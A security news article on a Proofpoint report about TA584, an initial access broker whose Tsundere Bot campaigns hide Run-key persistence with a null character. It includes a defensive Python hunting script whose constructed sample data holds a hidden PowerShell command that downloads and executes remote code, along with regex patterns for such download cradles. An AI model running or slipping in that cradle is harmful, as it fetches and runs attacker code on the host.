ClickFix steps | Image: Proofpoint
TA584, a sophisticated Initial Access Broker (IAB) known for paving the way for ransomware gangs, has dramatically escalated its operations in 2025. According to a new report from Proofpoint, the group has not only tripled its monthly campaign volume but also deployed a new, curiously named malware: Tsundere Bot.
The report paints a picture of a threat actor that is constantly evolving, blending “ClickFix” social engineering with highly technical stealth mechanisms to bypass modern defenses.
While TA584 has been on the radar since 2020, 2025 marked a turning point. The group’s operational tempo exploded, with “the number of monthly campaigns tripling from March to December 2025”.
Central to this surge is the introduction of Tsundere Bot, a new malware strain that highlights the group’s shift toward more bespoke tools. This addition suggests that TA584 is moving away from off-the-shelf commodity malware to develop its own arsenal, making detection significantly harder for defenders relying on known signatures.
As the researchers noted, “TA584’s activity is unique in the cybercrime landscape and shows how static detections alone are not reliable for constantly innovating threat actors”.
The most alarming aspect of the report isn’t just the malware itself, but how it hides. TA584 has adopted a clever persistence technique that exploits how Windows displays Registry keys.
By embedding a null character (a string terminator) in the Registry entry name, the group makes its malicious autorun key vanish from standard tools, which stop reading the name at the null. “The entry becomes effectively invisible to basic enumeration, hiding the malicious ‘Run’ key from casual inspection,” the report explains.
This “hidden key establishes an execution chain that triggers every system boot,” launching a sequence that moves from mshta to VBScript, and finally to a hidden PowerShell process.
The group’s sophistication extends to how they maintain control. Instead of storing the full malicious payload on the victim’s disk, the hidden PowerShell script fetches it dynamically from an external IP address every time the computer starts.
This strategy makes the infection modular and incredibly resilient. “The attacker ensures the infection is modular… maintaining a persistent, ‘effectively file-less’ foothold that is difficult to disrupt through standard file-system cleanup”.
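As an added illustration (not code from Proofpoint's report or from TA584's tooling), the following Python hunting helper looks for the boot-time chain described above, a VBScript host started by mshta that in turn launches a hidden, downloading PowerShell, in constructed Sysmon-style process-creation records, and separately flags Run-key value names that carry an embedded null. The event records, paths and the 203.0.113.10 address are all constructed sample data.

```python
import re

# Constructed Sysmon-like process-creation records (not real telemetry).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    {"pid": 100, "ppid": 1,   "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": r'mshta.exe "C:\Users\Public\stage1.hta"'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\wscript.exe",
     "cmd": r'wscript.exe //B "C:\Users\Public\stage2.vbs"'},
    {"pid": 400, "ppid": 300, "image": PS,
     "cmd": "powershell.exe -w hidden -ep bypass -c IEX (New-Object Net.WebClient)"
            ".DownloadString('http://203.0.113.10/p')"},  # constructed address
    {"pid": 500, "ppid": 100, "image": PS, "cmd": "powershell.exe -w hidden Get-Process"},
]

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I)
DOWNLOAD_RE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|https?://", re.I)

def basename(image):
    return image.rsplit("\\", 1)[-1].lower()

def ancestry(events, pid):
    """Return [process, parent, grandparent, ...] records, stopping at unknown pids."""
    by_pid = {e["pid"]: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid]["ppid"]
    return chain

def find_mshta_vbs_powershell_chains(events):
    """Flag hidden PowerShell that fetches content, whose parent is a VBScript
    host and whose grandparent is mshta: the boot-time chain from the report."""
    hits = []
    for e in events:
        if basename(e["image"]) != "powershell.exe":
            continue
        if not (HIDDEN_RE.search(e["cmd"]) and DOWNLOAD_RE.search(e["cmd"])):
            continue
        names = [basename(p["image"]) for p in ancestry(events, e["pid"])]
        if len(names) >= 3 and names[1] in SCRIPT_HOSTS and names[2] == "mshta.exe":
            hits.append(" -> ".join(reversed(names[:3])) + f" (pid {e['pid']})")
    return hits

def hidden_value_names(value_names):
    """Run-key value names containing an embedded NUL. Tools that treat names as
    C strings show only the prefix; feed names read as counted strings here."""
    return [n for n in value_names if "\x00" in n]
```

The second helper only finds the null if the names were read with their length (as native registry enumeration returns them); names already truncated by a Win32-style reader will not contain it.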
Proofpoint assesses with “high confidence” that TA584 is firmly embedded in the Russian cybercriminal ecosystem. The group operates as a specialized broker, cracking open networks to sell access to ransomware affiliates.
“Based on the malware used and artifacts in the attack chains, it is likely this actor is plugged in to the Russian cybercriminal ecosystem and underground markets,” the report confirms.
With global targeting and a rapidly expanding toolkit, TA584 has cemented its status as a top-tier threat. Organizations are urged to look beyond static file detection and monitor for the subtle behavioral anomalies—like hidden PowerShell processes—that reveal this “invisible” intruder.